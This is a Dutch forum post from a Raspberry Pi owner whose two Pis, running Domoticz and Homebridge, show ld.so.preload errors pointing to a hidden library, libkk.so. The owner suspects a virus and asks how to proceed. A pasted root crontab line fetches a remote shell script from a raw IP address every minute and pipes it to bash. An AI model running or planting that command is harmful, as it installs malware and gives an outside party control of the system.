Ik heb twee Pi, met alleen maar Domoticz en Homebridge. Ze staan aan, en verder doe ik er niets mee. (beetje up to date houden dan)
Ze hebben beiden Raspbian Jessie Stretch
Sinds enkele weken hebben beide pi's last van exact dezelfde foutmeldingen / errors.
Soms helpt het om ze te rebooten en blijft mijn Domotica gewoon werken, soms kan ik helemaal niets meer uitvoeren en moet de stroom eraf.
Zodra ik een terminal open bijv zie ik:
In ld.so.preload staat maar 1 regel, namelijk de verwijzing naar /usr/local/libkk.so
In laatstgenoemde staat enkel ASCII, waarvan ik in nano geen chocola kan maken.
Sluit ik (zonder opslaan) en open weer, dan is de inhoud weg.
Verwijder ik de verwijzing uit ld.so.preload, en sla deze op, dan krijg ik de melding dat het bestand is gewijzigd na het opslaan. ogenschijnlijk leeg, totdat ik reboot.
Na veel googlen kom ik links en rechts de suggestie tegen dat het heel goed een virus kan betreffen.
Een virusscanner krijg ik echter niet geïnstalleerd omdat te pas en te onpas opdrachten worden geblockt door een waslijst van bovengenoemde errors, of er komt simpelweg "geelimineerd" te staan en dan stop het proces.
Hoe is het nu het best verder te handelen?
behalve het nodige voor Homebridge ben ik redelijk Pi n00b
edit:
Ze hebben beiden Raspbian Jessie Stretch
Sinds enkele weken hebben beide pi's last van exact dezelfde foutmeldingen / errors.
Soms helpt het om ze te rebooten en blijft mijn Domotica gewoon werken, soms kan ik helemaal niets meer uitvoeren en moet de stroom eraf.
Zodra ik een terminal open bijv zie ik:
code:
1
2
3
4
| ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. pi@raspberrypi:~ $ |
In ld.so.preload staat maar 1 regel, namelijk de verwijzing naar /usr/local/libkk.so
In laatstgenoemde staat enkel ASCII, waarvan ik in nano geen chocola kan maken.
Sluit ik (zonder opslaan) en open weer, dan is de inhoud weg.
Verwijder ik de verwijzing uit ld.so.preload, en sla deze op, dan krijg ik de melding dat het bestand is gewijzigd na het opslaan. ogenschijnlijk leeg, totdat ik reboot.
Na veel googlen kom ik links en rechts de suggestie tegen dat het heel goed een virus kan betreffen.
Een virusscanner krijg ik echter niet geïnstalleerd omdat te pas en te onpas opdrachten worden geblockt door een waslijst van bovengenoemde errors, of er komt simpelweg "geelimineerd" te staan en dan stop het proces.
Hoe is het nu het best verder te handelen?
behalve het nodige voor Homebridge ben ik redelijk Pi n00b
edit:
code:
1
2
3
4
5
| pi@raspberrypi:~ $ sudo crontab -l ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (file too short): ignored. ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (file too short): ignored. * * * * * (curl -s http://107.172.234.175/mr.sh||wget -q -O - http://107.172.234.175/mr.sh)|bash -sh ## |
[ Voor 10% gewijzigd door paQ op 17-07-2019 21:05 ]
Ik doe niet aan bijgeloof. Dat brengt ongeluk.